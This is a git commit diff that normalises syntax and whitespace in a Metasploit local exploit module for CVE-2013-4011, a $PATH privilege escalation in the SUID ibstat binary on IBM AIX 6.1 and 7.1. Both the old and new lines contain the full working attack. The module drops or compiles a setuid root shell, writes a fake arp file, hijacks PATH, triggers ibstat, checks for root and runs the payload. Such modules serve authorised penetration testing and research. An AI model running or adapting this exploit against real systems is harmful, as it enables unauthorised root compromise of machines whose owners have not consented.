Normalize syntax and whitespace
parent
8611526a01
commit
6c67f1881f
|
@ -4,59 +4,58 @@
|
|||
##
|
||||
|
||||
class Metasploit4 < Msf::Exploit::Local
|
||||
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Post::File
|
||||
include Msf::Exploit::FileDropper
|
||||
|
||||
def initialize(info={})
|
||||
super( update_info( info,
|
||||
'Name' => 'ibstat $PATH Privilege Escalation',
|
||||
'Description' => %q{
|
||||
This module exploits the trusted $PATH environment variable of the SUID binary 'ibstat'.
|
||||
},
|
||||
'Author' =>
|
||||
[
|
||||
'Kristian Erik Hermansen', #original author
|
||||
'Sagi Shahar <sagi.shahar[at]mwrinfosecurity.com>', #Metasploit module
|
||||
'Kostas Lintovois <kostas.lintovois[at]mwrinfosecurity.com>', #Metasploit module
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2013-4011' ],
|
||||
[ 'OSVDB', '95420' ],
|
||||
[ 'BID', '61287' ],
|
||||
[ 'URL', 'http://www-01.ibm.com/support/docview.wss?uid=isg1IV43827' ],
|
||||
[ 'URL', 'http://www-01.ibm.com/support/docview.wss?uid=isg1IV43756' ]
|
||||
],
|
||||
'Platform' => [ 'unix' ],
|
||||
'Arch' => ARCH_CMD,
|
||||
'Payload' =>
|
||||
{
|
||||
'Compat' =>
|
||||
{
|
||||
'PayloadType' => 'cmd',
|
||||
'RequiredCmd' => 'perl',
|
||||
}
|
||||
},
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'IBM AIX Version 6.1', {} ],
|
||||
[ 'IBM AIX Version 7.1', {} ],
|
||||
],
|
||||
'DefaultTarget' => 1,
|
||||
'DisclosureDate'=> "Sep 24 2013",
|
||||
))
|
||||
register_options([
|
||||
OptString.new("WritableDir", [ true, "A directory where we can write files", "/tmp" ]),
|
||||
], self.class)
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
"Name" => "ibstat $PATH Privilege Escalation",
|
||||
"Description" => %q{
|
||||
This module exploits the trusted $PATH environment variable of the SUID binary "ibstat".
|
||||
},
|
||||
"Author" => [
|
||||
"Kristian Erik Hermansen", #original author
|
||||
"Sagi Shahar <sagi.shahar[at]mwrinfosecurity.com>", #Metasploit module
|
||||
"Kostas Lintovois <kostas.lintovois[at]mwrinfosecurity.com>" #Metasploit module
|
||||
],
|
||||
"References" => [
|
||||
["CVE", "2013-4011"],
|
||||
["OSVDB", "95420"],
|
||||
["BID", "61287"],
|
||||
["URL", "http://www-01.ibm.com/support/docview.wss?uid=isg1IV43827"],
|
||||
["URL", "http://www-01.ibm.com/support/docview.wss?uid=isg1IV43756"]
|
||||
],
|
||||
"Platform" => ["unix"],
|
||||
"Arch" => ARCH_CMD,
|
||||
"Payload" => {
|
||||
"Compat" => {
|
||||
"PayloadType" => "cmd",
|
||||
"RequiredCmd" => "perl"
|
||||
}
|
||||
},
|
||||
"Targets" => [
|
||||
["IBM AIX Version 6.1", {}],
|
||||
["IBM AIX Version 7.1", {}]
|
||||
],
|
||||
"DefaultTarget" => 1,
|
||||
"DisclosureDate" => "Sep 24 2013"
|
||||
))
|
||||
|
||||
register_options([
|
||||
OptString.new("WritableDir", [true, "A directory where we can write files", "/tmp"])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def check
|
||||
find_output = cmd_exec "find /usr/sbin/ -name ibstat -perm -u=s -user root 2>/dev/null"
|
||||
if find_output.include? "ibstat"
|
||||
find_output = cmd_exec("find /usr/sbin/ -name ibstat -perm -u=s -user root 2>/dev/null")
|
||||
|
||||
if find_output.include?("ibstat")
|
||||
return Exploit::CheckCode::Vulnerable
|
||||
end
|
||||
|
||||
Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
|
@ -88,60 +87,74 @@ chmod 4555 #{root_file}
|
|||
if gcc_installed?
|
||||
print_status("Dropping file #{root_file}.c...")
|
||||
write_file("#{root_file}.c", c_file)
|
||||
|
||||
print_status("Compiling source...")
|
||||
cmd_exec "gcc -o #{root_file} #{root_file}.c"
|
||||
cmd_exec("gcc -o #{root_file} #{root_file}.c")
|
||||
print_status("Compilation completed")
|
||||
|
||||
register_file_for_cleanup("#{root_file}.c")
|
||||
else
|
||||
cmd_exec "cp /bin/sh #{root_file}"
|
||||
cmd_exec("cp /bin/sh #{root_file}")
|
||||
end
|
||||
register_file_for_cleanup("#{root_file}")
|
||||
|
||||
register_file_for_cleanup(root_file)
|
||||
|
||||
print_status("Writing custom arp file...")
|
||||
write_file("#{arp_file}",arp)
|
||||
register_file_for_cleanup("#{arp_file}")
|
||||
cmd_exec "chmod 0555 #{arp_file}"
|
||||
write_file(arp_file,arp)
|
||||
register_file_for_cleanup(arp_file)
|
||||
cmd_exec("chmod 0555 #{arp_file}")
|
||||
print_status("Custom arp file written")
|
||||
|
||||
print_status("Updating $PATH environment variable...")
|
||||
path_env = cmd_exec 'echo $PATH'
|
||||
cmd_exec "PATH=#{datastore["WritableDir"]}:$PATH"
|
||||
cmd_exec 'export PATH'
|
||||
path_env = cmd_exec("echo $PATH")
|
||||
cmd_exec("PATH=#{datastore["WritableDir"]}:$PATH")
|
||||
cmd_exec("export PATH")
|
||||
|
||||
print_status("Triggering vulnerablity...")
|
||||
cmd_exec '/usr/bin/ibstat -a -i en0 2>/dev/null >/dev/null'
|
||||
cmd_exec("/usr/bin/ibstat -a -i en0 2>/dev/null >/dev/null")
|
||||
|
||||
# The $PATH variable must be restored before the payload is executed
|
||||
# in cases where an euid root shell was gained
|
||||
print_status('Restoring $PATH environment variable...')
|
||||
cmd_exec "PATH=#{path_env}"
|
||||
cmd_exec 'export PATH'
|
||||
cmd_exec "#{root_file}"
|
||||
print_status("Restoring $PATH environment variable...")
|
||||
cmd_exec("PATH=#{path_env}")
|
||||
cmd_exec("export PATH")
|
||||
|
||||
cmd_exec(root_file)
|
||||
print_status("Checking root privileges...")
|
||||
|
||||
if is_root?
|
||||
print_status("Executing payload...")
|
||||
cmd_exec "#{payload.encoded}"
|
||||
cmd_exec(payload.encoded)
|
||||
end
|
||||
end
|
||||
|
||||
def gcc_installed?
|
||||
print_status("Checking if gcc exists...")
|
||||
gcc_whereis_output = cmd_exec "whereis -b gcc"
|
||||
if gcc_whereis_output.include? "/"
|
||||
gcc_whereis_output = cmd_exec("whereis -b gcc")
|
||||
|
||||
if gcc_whereis_output.include?("/")
|
||||
print_good("gcc found!")
|
||||
return true
|
||||
end
|
||||
|
||||
print_status("gcc not found. Using /bin/sh from local system")
|
||||
false
|
||||
end
|
||||
|
||||
def is_root?
|
||||
id_output = cmd_exec "id"
|
||||
if id_output.include? "euid=0(root)"
|
||||
id_output = cmd_exec("id")
|
||||
|
||||
if id_output.include?("euid=0(root)")
|
||||
print_good("Got root! (euid)")
|
||||
return true
|
||||
end
|
||||
if id_output.include? "uid=0(root)"
|
||||
if id_output.include?("uid=0(root)")
|
||||
print_good("Got root!")
|
||||
return true
|
||||
end
|
||||
|
||||
print_status("Exploit failed")
|
||||
false
|
||||
end
|
||||
|
||||
end
|
Loading…
Reference in New Issue